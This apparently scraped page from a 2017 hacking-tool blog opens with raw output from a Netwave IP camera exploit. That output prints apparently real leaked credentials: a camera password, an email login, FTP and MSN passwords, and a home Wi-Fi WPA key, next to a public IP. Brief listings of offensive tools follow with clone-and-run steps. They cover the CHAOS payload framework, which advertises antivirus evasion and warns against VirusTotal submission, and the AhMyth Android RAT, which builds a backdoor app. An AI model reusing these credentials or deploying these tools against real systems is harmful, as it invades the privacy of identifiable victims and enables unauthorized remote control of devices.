[+] Netwave IP Camera Found: 111307
[+] Passwords loaded: 12
[!] Disable password discovery module? (Yes/no): Yes
[+] Password Found admin@123456
[!] Trying to get more information
[+] Email: basile.antonio@orange.fr:vitaline19
[+] FTP: ftp://basile.an1tonio.perso.sfr.fr:vitalineD519@http://ftpperso.sfr.fr/:21
[+] MSN: camera-rousselin1@hotmail.fr@vitaline19
[!] Getting System Information
[!] Getting Wireless System Information
[+] Mac address found E8ABFA1A9374
[+] Host: http://186.193.55.18:8080
[+] Country: n/a
[+] Organization: Nettel Telecomunicaçþes Ltda.
[+] Product: Netwave IP camera http config
[+] SSID: moslekok
[+] WPAPSK: TulSokanLoptatok
[+] Starting to read memory dump.. this could take a few minutes
[+] CTRL+C to exit..
[+] Binary data: 70560
[+] Strings in binary data found.. password should be around line 10000
[+] Mac address triggered.. printing the following dumps, could leak username and passwords..
[+] Firstline... CAMERA2
[+] Possible username: admin
[+] Possible password: ac00310
[+] Following line..

Install Requirements
pip install -r /path/to/requirements.txt
You need the API key to run. You can get a key free on https://www.shodan.io/

References:

TorStat - Tor Statistics

July 12, 2017, 3:45 pm
$
0
0

Tor Statistics

Requirements

Installation and execution
Then you can download smap by cloning the Git repository:
git clone https://github.com/suraj-root/TorStat.git
cd TorStat/
proxychains python TorStat.py

Demo video

For educational purposes only.


Search

Burp Vulners Scanner - Vulnerability scanner based on vulners.com search API

July 13, 2017, 8:09 am
$
0
0

Burp Suite scanner plugin based on Vulners.com vulnerability database API
  • Search fingerprints in HTTP response (inspired by plugin "Software Version Reporter") and check found version in vulners.com vulnerability database
  • [Experemental] Check unique URLs in vulners.com finding exploits for such paths
If Vulners Plugin detects vulnerable software it will show you CVE, advisoroies, and even applicable exploits!

How to use


Requirements
  • Burp Suite - Professional Edition
  • Java 1.7
  • Maven

Installation
  1. Clone repository
  2. From command line run 
    mvn package
  3. find burp-vulners-scanner.jar in /target folder
  4. open Burp Suite -> Extender -> Add -> path to plugin.jar

Build
Ready to install build burp-vulners-scanner.jar


smap - Shellcode Mapper

July 13, 2017, 4:30 pm

CHAOS Framework - Generate Payloads and Control Remote Machines

July 14, 2017, 8:30 am
$
0
0

CHAOS Framework allows generate payloads and controls remote machines.

DISCLAIMER
The use of the CHAOS Framework is COMPLETE RESPONSIBILITY of the END-USER. Developer assumes NO liability and is NOT responsible for any misuse or damage caused by this program.

FEATURES
  • Windows Remote Control
  • Download File
  • Upload File
  • Persistence
  • Open Url Remotely
  • Get Operating System Name
  • Run Fork Bomb

TESTED ON
Kali)Kali Linux - ROLLING EDITION

USAGE
You need Golang and UPX package installed!

Install Prerequisites
# apt install golang upx-ucl -y

Cloning
git clone https://github.com/tiagorlampert/CHAOS.git

Running
cd CHAOS
go run CHAOS.go
Note: CHAOS has a delay of 70 seconds to bypass most of the antivirus and sandboxes.


VIDEO DEMONSTRATION

Don't submit to VirusTotal or other scanning service. :3



AhMyth Android RAT - Android Remote Administration Tool

July 15, 2017, 7:30 am
$
0
0

AhMyth Android RAT is an Android Remote Administration Tool

Beta Version
It consists of two parts:
  • Server side: desktop application based on electron framework (control panel)
  • Client side: Android application (backdoor)

Getting Started

From source code

Prerequisite :
  • Electron (to start the app)
  • Java (to generate apk backdoor)
  • Electron-builder and electron-packer (to build binaries for (OSX,WINDOWS,LINUX))
  1. git clone https://github.com/AhMyth/AhMyth-Android-RAT.git
  2. cd AhMyth-Android-RAT
  3. npm start

From binaries

Prerequisite :

Screenshot



Video Tutorial

CloudFail - Utilize misconfigured DNS and old database records to find hidden IP's behind the CloudFlare network

July 16, 2017, 7:12 am
$
0
0

CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by CloudFlare in the hopes of discovering the location of the server. Using Tor to mask all requests, the tool as of right now has 3 different attack phases.
  1. Misconfigured DNS scan using DNSDumpster.com.
  2. Scan the Crimeflare.com database.
  3. Bruteforce scan over 2500 subdomains.
Please feel free to contribute to this project. If you have an idea or improvement issue a pull request!

Disclaimer
This tool is a PoC (Proof of Concept) and does not guarantee results. It is possible to setup CloudFlare properly so that the IP is never released or logged anywhere; this is not often the case and hence why this tool exists. This tool is only for academic purposes and testing under controlled environments. Do not use without obtaining proper authorization from the network owner of the network under testing. The author bears no responsibility for any misuse of the tool.

Usage
To run a scan against a target:
python cloudfail.py --target seo.com

To run a scan against a target using Tor:
service tor start

(or if you are using Windows or Mac install vidalia or just run the Tor browser)
python cloudfail.py --target seo.com --tor


Dependencies
Python3
  • argparse
  • colorama
  • socket
  • binascii
  • datetime
  • requests
  • win_inet_pton

Viewing all 5816 articles
Browse latest View live
Search